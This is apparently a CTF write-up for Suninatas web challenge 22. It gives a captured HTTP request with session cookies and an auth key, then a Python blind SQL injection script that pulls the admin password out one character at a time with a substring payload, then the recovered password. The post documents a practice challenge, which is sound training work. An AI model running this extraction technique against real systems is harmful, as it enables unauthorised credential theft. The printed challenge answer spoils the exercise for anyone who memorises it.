Suninatas Game 22

Posted on Edited on In Views: Disqus: Word count in article: 320 Reading time ≈ 1 mins.

challenges

Game 22

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Blind Sql Injection Filtering Keywords select / Union / or / white space / by /
having from / char / ascii / left / right / delay / 0x ..........

<!-- Hint : guest / guest & Your goal is to find the admin's pw -->
<!-- M@de by 2theT0P -->

GET /challenge/web22/web22.asp?id=admin&pw=admin HTTP/1.1 Host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101
Firefox/147.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:
en-US,en;q=0.9 Accept-Encoding: gzip, deflate Dnt: 1 Sec-Gpc: 1 Connection:
keep-alive Referer:
http://suninatas.com/challenge/web22/web22.asp?id=admin&pw=admin Cookie:
ASP.NET_SessionId=3g042optmn40uhuoxlqhkvai;
ASPSESSIONIDACTRACSS=MEJDPMPAHECDELCJCFEOEINE;
ASPSESSIONIDCCTSAAQT=NNMDDJIBCMFACGADEKFHFNCA;
ASPSESSIONIDQSBTDCST=DNDPAPJCEPOJPKPFACBKBPKJ;
auth%5Fkey=65038b0559e459420aa2d23093d01e4a;
ASPSESSIONIDAARSBCRR=NNOJOPPCBMOBJCNACCPNBHIP;
ASPSESSIONIDCCTQCCSR=FLDDKMEDLOFIPEODAHAPDDID Upgrade-Insecure-Requests: 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import requests
import string

url = "http://suninatas.com/challenge/web22/web22.asp"
cookies = {
        "ASP.NET_SessionId": "3g042optmn40uhuoxlqhkvai",
        "ASPSESSIONIDACTRACSS": "MEJDPMPAHECDELCJCFEOEINE",
        "ASPSESSIONIDCCTSAAQT": "NNMDDJIBCMFACGADEKFHFNCA",
        "ASPSESSIONIDQSBTDCST": "DNDPAPJCEPOJPKPFACBKBPKJ",
        "auth_key": "65038b0559e459420aa2d23093d01e4a",
        "ASPSESSIONIDAARSBCRR": "NNOJOPPCBMOBJCNACCPNBHIP",
        "ASPSESSIONIDCCTQCCSR": "FLDDKMEDLOFIPEODAHAPDDID",
        "ASPSESSIONIDCCRRBDTT": "AGEJLNGDPEFCCNCGDHAPBLEH"
}

charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"

password = ""
for i in range(1, 31):
    found_char = False
    for char in charset:
        # substring(pw, index, length)
        payload = f"'and(substring(pw,{i},1)='{char}')--"

        params = {
            'id': 'admin' + payload,
            'pw': 'a',
        }

        try:
            target_url = f"{url}?id={params['id']}&pw={params['pw']}"
            r = requests.get(target_url, cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    if not found_char:
        print("[-] End of password or char not in charset.")
        break

print(f"
[SUCCESS] Final Password: {password}")
1
2
3
4
5
6
7
8
9
10
11
12
13
[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
N1c3Bilnl)